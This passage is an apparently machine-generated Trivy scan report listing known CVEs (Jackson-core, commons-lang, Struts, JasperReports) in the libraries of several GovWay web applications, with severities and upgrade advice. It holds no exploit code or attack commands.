O(n^2) `BigInteger` parsing operations, leading to a CPU-based DoS. ### Suggested Remediation The async parsing path should be updated to respect the `maxNumberLength` constraint. The simplest fix appears to ensure that `_valueComplete()` or a similar method in the async path calls the appropriate validation methods (`resetInt()` or `resetFloat()`) already present in `ParserBase`, mirroring the behavior of the synchronous parsers. **NOTE:** This research was performed in collaboration with [rohan-repos](https://github.com/rohan-repos) Package: com.fasterxml.jackson.core:jackson-core Installed Version: 2.15.2 Vulnerability GHSA-72hv-8253-57qq Severity: HIGH Fixed Version: 2.18.6, 2.21.1, 3.1.0 Link: [GHSA-72hv-8253-57qq](https://github.com/advisories/GHSA-72hv-8253-57qq)GHSA-72hv-8253-57qq0--commons-lang-2.6.jar00-/usr/local/tomcat/webapps/govwayAPIConfig.war/WEB-INF/lib/commons-lang-2.6.jarFALLBACK-f48ad3a611CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)trivyTrivy Security Scanner-1390NORMALcommons-lang-2.6.jar(1,0): CVE-2025-48924: : CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)CVE-2025-489240--struts-core-1.3.10.jar00-/usr/local/tomcat/webapps/govwayAPIConfig.war/WEB-INF/lib/struts-core-1.3.10.jarFALLBACK-1907267611CVE-2023-34396: LanguageSpecificPackageVulnerability Apache Struts vulnerable to memory exhaustion For additional help see: **Vulnerability CVE-2023-34396** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|org.apache.struts:struts-core||[CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)| Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater Package: org.apache.struts:struts-core Installed Version: 1.3.10 Vulnerability CVE-2023-34396 Severity: HIGH Fixed Version: Link: [CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)trivyTrivy Security Scanner-1390HIGHstruts-core-1.3.10.jar(1,0): CVE-2023-34396: : CVE-2023-34396: LanguageSpecificPackageVulnerability Apache Struts vulnerable to memory exhaustion For additional help see: **Vulnerability CVE-2023-34396** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|org.apache.struts:struts-core||[CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)| Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater Package: org.apache.struts:struts-core Installed Version: 1.3.10 Vulnerability CVE-2023-34396 Severity: HIGH Fixed Version: Link: [CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)CVE-2023-343960--commons-lang-2.6.jar00-/usr/local/tomcat/webapps/govwayAPIMonitor.war/WEB-INF/lib/commons-lang-2.6.jarFALLBACK-f48ad3a611CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)trivyTrivy Security Scanner-1390NORMALcommons-lang-2.6.jar(1,0): CVE-2025-48924: : CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)CVE-2025-489240--jasperreports-6.20.0.jar00-/usr/local/tomcat/webapps/govwayAPIMonitor.war/WEB-INF/lib/jasperreports-6.20.0.jarFALLBACK-b0f3610311CVE-2025-10492: LanguageSpecificPackageVulnerability JasperReports has a Java deserialisation vulnerability For additional help see: **Vulnerability CVE-2025-10492** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|net.sf.jasperreports:jasperreports|7.0.4|[CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)| A Java deserialisation vulnerability has been discovered in Jaspersoft Library. Improper handling of externally supplied data may allow attackers to execute arbitrary code remotely on systems that use the affected library Package: net.sf.jasperreports:jasperreports Installed Version: 6.20.0 Vulnerability CVE-2025-10492 Severity: HIGH Fixed Version: 7.0.4 Link: [CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)trivyTrivy Security Scanner-1390HIGHjasperreports-6.20.0.jar(1,0): CVE-2025-10492: : CVE-2025-10492: LanguageSpecificPackageVulnerability JasperReports has a Java deserialisation vulnerability For additional help see: **Vulnerability CVE-2025-10492** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|net.sf.jasperreports:jasperreports|7.0.4|[CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)| A Java deserialisation vulnerability has been discovered in Jaspersoft Library. Improper handling of externally supplied data may allow attackers to execute arbitrary code remotely on systems that use the affected library Package: net.sf.jasperreports:jasperreports Installed Version: 6.20.0 Vulnerability CVE-2025-10492 Severity: HIGH Fixed Version: 7.0.4 Link: [CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)CVE-2025-104920--commons-lang-2.6.jar00-/usr/local/tomcat/webapps/govwayConsole.war/WEB-INF/lib/commons-lang-2.6.jarFALLBACK-f48ad3a611CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)trivyTrivy Security Scanner-1390NORMALcommons-lang-2.6.jar(1,0): CVE-2025-48924: : CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)CVE-2025-489240--struts-core-1.3.10.jar00-/usr/local/tomcat/webapps/govwayConsole.war/WEB-INF/lib/struts-core-1.3.10.jarFALLBACK-1907267611CVE-2023-34396: LanguageSpecificPackageVulnerability Apache Struts vulnerable to memory exhaustion For additional help see: **Vulnerability CVE-2023-34396** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|org.apache.struts:struts-core||[CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)| Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater Package: org.apache.struts:struts-core Installed Version: 1.3.10 Vulnerability CVE-2023-34396 Severity: HIGH Fixed Version: Link: [CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)trivyTrivy Security Scanner-1390HIGHstruts-core-1.3.10.jar(1,0): CVE-2023-34396: : CVE-2023-34396: LanguageSpecificPackageVulnerability Apache Struts vulnerable to memory exhaustion For additional help see: **Vulnerability CVE-2023-34396** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|org.apache.struts:struts-core||[CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)| Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater Package: org.apache.struts:struts-core Installed Version: 1.3.10 Vulnerability CVE-2023-34396 Severity: HIGH Fixed Version: Link: [CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)CVE-2023-343960--commons-lang-2.6.jar00-/usr/local/tomcat/webapps/govwayMonitor.war/WEB-INF/lib/commons-lang-2.6.jarFALLBACK-f48ad3a611CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)trivyTrivy Security Scanner-1390NORMALcommons-lang-2.6.jar(1,0): CVE-2025-48924: : CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)CVE-2025-489240--jasperreports-6.20.0.jar00-/usr/local/tomcat/webapps/govwayMonitor.war/WEB-INF/lib/jasperreports-6.20.0.jarFALLBACK-b0f3610311CVE-2025-10492: LanguageSpecificPackageVulnerability JasperReports has a Java deserialisation vulnerability For additional help see: **Vulnerability CVE-2025-10492** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|net.sf.jasperreports:jasperreports|7.0.4|[CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)| A Java deserialisation vulnerability has been discovered in Jaspersoft Library. Improper handling of externally supplied data may allow attackers to execute arbitrary code remotely on systems that use the affected library Package: net.sf.jasperreports:jasperreports Installed Version: 6.20.0 Vulnerability CVE-2025-10492 Severity: HIGH Fixed Version: 7.0.4 Link: [CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)trivyTrivy Security Scanner-1390HIGHjasperreports-6.20.0.jar(1,0): CVE-2025-10492: : CVE-2025-10492: LanguageSpecificPackageVulnerability JasperReports has a Java deserialisation vulnerability For additional help see: **Vulnerability CVE-2025-10492** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|net.sf.jasperreports:jasperreports|7.0.4|[CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)| A Java deserialisation vulnerability has been discovered in Jaspersoft Library. Improper handling of externally supplied data may allow attackers to execute arbitrary code remotely on systems that use the affected library Package: net.sf.jasperreports:jasperreports Installed Version: 6.20.0 Vulnerability CVE-2025-10492 Severity: HIGH Fixed Version: 7.0.4 Link: [CVE-2025-10492](https://avd.aquasec.com/nvd/cve-2025-10492)CVE-2025-104920--struts-core-1.3.10.jar00-/usr/local/tomcat/webapps/govwayMonitor.war/WEB-INF/lib/struts-core-1.3.10.jarFALLBACK-1907267611CVE-2023-34396: LanguageSpecificPackageVulnerability Apache Struts vulnerable to memory exhaustion For additional help see: **Vulnerability CVE-2023-34396** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|org.apache.struts:struts-core||[CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)| Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater Package: org.apache.struts:struts-core Installed Version: 1.3.10 Vulnerability CVE-2023-34396 Severity: HIGH Fixed Version: Link: [CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)trivyTrivy Security Scanner-1390HIGHstruts-core-1.3.10.jar(1,0): CVE-2023-34396: : CVE-2023-34396: LanguageSpecificPackageVulnerability Apache Struts vulnerable to memory exhaustion For additional help see: **Vulnerability CVE-2023-34396** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|org.apache.struts:struts-core||[CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)| Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater Package: org.apache.struts:struts-core Installed Version: 1.3.10 Vulnerability CVE-2023-34396 Severity: HIGH Fixed Version: Link: [CVE-2023-34396](https://avd.aquasec.com/nvd/cve-2023-34396)CVE-2023-343961515 warnings (high: 7, normal: 8)